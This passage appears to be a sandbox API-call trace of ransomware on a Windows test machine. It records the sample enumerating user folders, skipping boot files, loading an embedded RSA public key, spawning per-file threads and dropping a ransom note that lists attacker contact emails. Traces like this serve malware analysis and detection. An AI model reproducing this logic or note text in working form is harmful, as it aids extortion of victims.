All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0044.570] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my videos\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.570] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my videos\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x518 [0044.570] WriteFile (in: hFile=0x518, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0044.571] CloseHandle (hObject=0x518) returned 1 [0044.571] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Videos\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0xffffffff [0044.571] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0044.571] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0044.571] lstrcmpW (lpString1="Outlook Files", lpString2="..") returned 1 [0044.572] lstrcmpW (lpString1="Outlook Files", lpString2=".") returned 1 [0044.572] lstrcpyW (in: lpString1=0x17d570, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0044.572] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0044.572] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="Outlook Files" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" [0044.572] SetErrorMode (uMode=0x1) returned 0x1 [0044.572] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" [0044.572] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0044.572] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0044.572] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*" [0044.572] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x42e4f90 [0044.573] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="Outlook Files" [0044.573] lstrcpyW (in: lpString1=0x17b644, lpString2="Outlook Files" | out: lpString1="Outlook Files") returned="Outlook Files" [0044.573] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0044.573] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0044.573] lstrcmpW (lpString1="voeimd@djhreuu.uhd.pst", lpString2="..") returned 1 [0044.573] lstrcmpW (lpString1="voeimd@djhreuu.uhd.pst", lpString2=".") returned 1 [0044.573] StrStrW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0044.573] StrStrW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch="ntldr") returned 0x0 [0044.573] StrStrW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch="NTLDR") returned 0x0 [0044.573] StrStrW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch="NTDETECT.COM") returned 0x0 [0044.573] StrStrW (lpFirst="voeimd@djhreuu.uhd.pst", lpSrch="ntdetect.com") returned 0x0 [0044.573] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="Desktop") returned 0x0 [0044.573] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="DESKTOP") returned 0x0 [0044.573] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned 58 [0044.573] lstrcpyA (in: lpString1=0x17b87c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0044.573] lstrcpyW (in: lpString1=0x17be7c, lpString2="voeimd@djhreuu.uhd.pst" | out: lpString1="voeimd@djhreuu.uhd.pst") returned="voeimd@djhreuu.uhd.pst" [0044.573] lstrcpyW (in: lpString1=0x17ba7c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\" [0044.573] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17b87c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x510 [0044.574] Sleep (dwMilliseconds=0x96) [0044.760] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0044.760] FindClose (in: hFindFile=0x42e4f90 | out: hFindFile=0x42e4f90) returned 1 [0044.760] FindClose (in: hFindFile=0x42e4f90 | out: hFindFile=0x42e4f90) returned 0 [0044.760] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files" [0044.760] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*" [0044.760] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="Desktop") returned 0x0 [0044.760] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\", lpSrch="DESKTOP") returned 0x0 [0044.760] SetErrorMode (uMode=0x1) returned 0x1 [0044.760] wsprintfW (in: param_1=0x17b43c, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\_HELP_INSTRUCTION.TXT") returned 75 [0044.760] GetUserNameW (in: lpBuffer=0x179218, pcbBuffer=0x179004 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x179004) returned 1 [0044.760] wsprintfW (in: param_1=0x179010, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0044.760] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17900c | out: phkResult=0x17900c*=0x528) returned 0x0 [0044.761] RegQueryValueExW (in: hKey=0x528, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3e12648, lpcbData=0x179008*=0x104 | out: lpType=0x0, lpData=0x3e12648*=0x65, lpcbData=0x179008*=0x4a) returned 0x0 [0044.761] RegCloseKey (hKey=0x528) returned 0x0 [0044.761] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17a43c, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0044.761] wsprintfW (in: param_1=0x17943c, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0044.761] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.761] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\outlook files\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x520 [0044.768] WriteFile (in: hFile=0x520, lpBuffer=0x17943c*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x179434, lpOverlapped=0x0 | out: lpBuffer=0x17943c*, lpNumberOfBytesWritten=0x179434*=0x2c4, lpOverlapped=0x0) returned 1 [0044.769] CloseHandle (hObject=0x520) returned 1 [0044.769] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files\\*.*", lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0x42e4f90 [0044.769] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Outlook Files") returned="Outlook Files" [0044.769] lstrcpyW (in: lpString1=0x17b644, lpString2="Outlook Files" | out: lpString1="Outlook Files") returned="Outlook Files" [0044.769] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.769] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.769] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0044.769] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.769] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0044.769] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 1 [0044.769] FindNextFileW (in: hFindFile=0x42e4f90, lpFindFileData=0x17c280 | out: lpFindFileData=0x17c280) returned 0 [0044.769] FindClose (in: hFindFile=0x42e4f90 | out: hFindFile=0x42e4f90) returned 1 [0044.769] FindClose (in: hFindFile=0x42e4f90 | out: hFindFile=0x42e4f90) returned 0 [0044.769] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0044.769] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0044.770] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0044.770] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0044.770] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 1 [0044.770] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 0 [0044.770] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0044.770] lstrcmpW (lpString1="Downloads", lpString2="..") returned 1 [0044.770] lstrcmpW (lpString1="Downloads", lpString2=".") returned 1 [0044.770] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0044.770] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\" [0044.770] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Downloads" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" [0044.770] SetErrorMode (uMode=0x1) returned 0x1 [0044.770] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" [0044.770] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" [0044.770] lstrcpyW (in: lpString1=0x5582a700, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" [0044.770] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpString2="*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*" [0044.770] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x324878 [0044.770] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="Downloads" [0044.770] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0044.770] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0044.770] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0044.770] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0044.770] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0044.770] StrStrW (lpFirst="desktop.ini", lpSrch="_HELP_INSTRUCTION.TXT") returned 0x0 [0044.770] StrStrW (lpFirst="desktop.ini", lpSrch="ntldr") returned 0x0 [0044.770] StrStrW (lpFirst="desktop.ini", lpSrch="NTLDR") returned 0x0 [0044.770] StrStrW (lpFirst="desktop.ini", lpSrch="NTDETECT.COM") returned 0x0 [0044.770] StrStrW (lpFirst="desktop.ini", lpSrch="ntdetect.com") returned 0x0 [0044.770] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="Desktop") returned 0x0 [0044.770] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="DESKTOP") returned 0x0 [0044.770] wsprintfW (in: param_1=0x5582ab10, param_2="\\\\?\\%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned 44 [0044.770] lstrcpyA (in: lpString1=0x17c91c, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0044.770] lstrcpyW (in: lpString1=0x17cf1c, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0044.770] lstrcpyW (in: lpString1=0x17cb1c, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\" [0044.770] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x55822440, lpParameter=0x17c91c, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x51c [0044.771] Sleep (dwMilliseconds=0x96) [0044.924] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0044.924] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 1 [0044.924] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 0 [0044.924] lstrcpyW (in: lpString1=0x5582a2f0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads" [0044.924] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*" [0044.924] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="Desktop") returned 0x0 [0044.924] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\", lpSrch="DESKTOP") returned 0x0 [0044.924] SetErrorMode (uMode=0x1) returned 0x1 [0044.924] wsprintfW (in: param_1=0x17c4dc, param_2="%s\\_HELP_INSTRUCTION.TXT" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\_HELP_INSTRUCTION.TXT") returned 61 [0044.925] GetUserNameW (in: lpBuffer=0x17a2b8, pcbBuffer=0x17a0a4 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x17a0a4) returned 1 [0044.925] wsprintfW (in: param_1=0x17a0b0, param_2="FF%08X" | out: param_1="FFE1010314") returned 10 [0044.925] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x17a0ac | out: phkResult=0x17a0ac*=0x52c) returned 0x0 [0044.925] RegQueryValueExW (in: hKey=0x52c, lpValueName="FFE1010314", lpReserved=0x0, lpType=0x0, lpData=0x3de3608, lpcbData=0x17a0a8*=0x104 | out: lpType=0x0, lpData=0x3de3608*=0x65, lpcbData=0x17a0a8*=0x4a) returned 0x0 [0044.925] RegCloseKey (hKey=0x52c) returned 0x0 [0044.925] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55829720, cbMultiByte=-1, lpWideCharStr=0x17b4dc, cchWideChar=2048 | out: lpWideCharStr="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n") returned 321 [0044.925] wsprintfW (in: param_1=0x17a4dc, param_2="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-%s number\r\n\r\n" | out: param_1="Hello!\r\n\r\nAttention! All Your data was encrypted!\r\n\r\nFor specific informartion, please send us an email with Your ID number:\r\n\r\nxzzx@tuta.io\r\n\r\nxzzx1@protonmail.com\r\n\r\nxzzx10@yandex.com\r\n\r\nxzzx101@yandex.com\r\n\r\nPlease send email to all email addresses! We will help You as soon as possible!\r\n\r\n\r\nDECRYPT-ID-eb9e4beb-6738-47db-bcc2-4b2202afb33f number\r\n\r\n") returned 354 [0044.925] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\_help_instruction.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0044.925] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\_HELP_INSTRUCTION.TXT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\downloads\\_help_instruction.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0044.925] WriteFile (in: hFile=0x52c, lpBuffer=0x17a4dc*, nNumberOfBytesToWrite=0x2c4, lpNumberOfBytesWritten=0x17a4d4, lpOverlapped=0x0 | out: lpBuffer=0x17a4dc*, lpNumberOfBytesWritten=0x17a4d4*=0x2c4, lpOverlapped=0x0) returned 1 [0044.926] CloseHandle (hObject=0x52c) returned 1 [0044.926] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads\\*.*", lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0x324878 [0044.926] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Downloads") returned="Downloads" [0044.926] lstrcpyW (in: lpString1=0x17c6e4, lpString2="Downloads" | out: lpString1="Downloads") returned="Downloads" [0044.927] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0044.927] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0044.927] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0044.927] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0044.927] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0044.927] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 1 [0044.927] FindNextFileW (in: hFindFile=0x324878, lpFindFileData=0x17d320 | out: lpFindFileData=0x17d320) returned 0 [0044.927] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 1 [0044.927] FindClose (in: hFindFile=0x324878 | out: hFindFile=0x324878) returned 0 [0044.927] FindNextFileW (in: hFindFile=0x324738, lpFindFileData=0x17e3c0 | out: lpFindFileData=0x17e3c0) returned 1 [0044.927] lstrcmpW (lpString1="Favorites", lpString2="..") returned 1 [0044.927] lstrcmpW (lpString1="Favorites", lpString2=".") returned 1 [0044.927] lstrcpyW (in: lpString1=0x17e610, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz" [0044.927] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS 